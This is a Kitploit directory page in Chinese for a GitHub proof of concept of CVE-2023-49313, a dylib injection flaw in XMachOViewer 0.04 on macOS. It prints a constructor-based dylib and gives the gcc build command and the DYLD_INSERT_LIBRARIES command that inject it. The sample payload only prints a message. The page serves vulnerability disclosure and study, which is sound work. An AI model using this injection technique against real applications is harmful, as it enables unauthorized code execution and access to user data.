Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-49313 — XMachOViewer 0.04 中存在一个 dylib 注入漏洞,攻击者可利用该漏洞破坏完整性。通过利用此漏洞,可将未经授权的代码注入产品进程,从而可能导致远程控制以及对敏感用户数据的未授权访问。 | Kitploit
工具/GitHubGitHub/louiselalanne/cve-2023-49313
漏洞利用学习与教育Payload 开发二进制利用
GitHublouiselalanne/cve-2023-49313

CVE-2023-49313

XMachOViewer 0.04 中存在一个 dylib 注入漏洞,攻击者可利用该漏洞破坏完整性。通过利用此漏洞,可将未经授权的代码注入产品进程,从而可能导致远程控制以及对敏感用户数据的未授权访问。

查看仓库
42年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-49313

XMachOViewer 0.04 中存在一个 dylib 注入漏洞,攻击者可借此破坏完整性。通过利用该漏洞,攻击者能够将未经授权的代码注入产品进程,进而可能导致远程控制以及对敏感用户数据的未授权访问。

Captura de Tela 2023-11-27 às 20 06 48

适用于 macOS 的便携版

  • 首先,我们来编写 dylib
root@kitploit:~
#include <syslog.h>
#include <stdio.h>

__attribute__((constructor))
static void poc(void)
{
    printf("Malicious Dylib Inserted");
}
  • 编译 gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c

  • 然后进行注入: DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer

这将打开应用程序并运行 dylib。关闭应用程序后,我们便可在终端中看到:

Captura de Tela 2023-11-27 às 19 52 57

  • 你可以通过以下地址学习并深入了解该主题:https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries
下载工具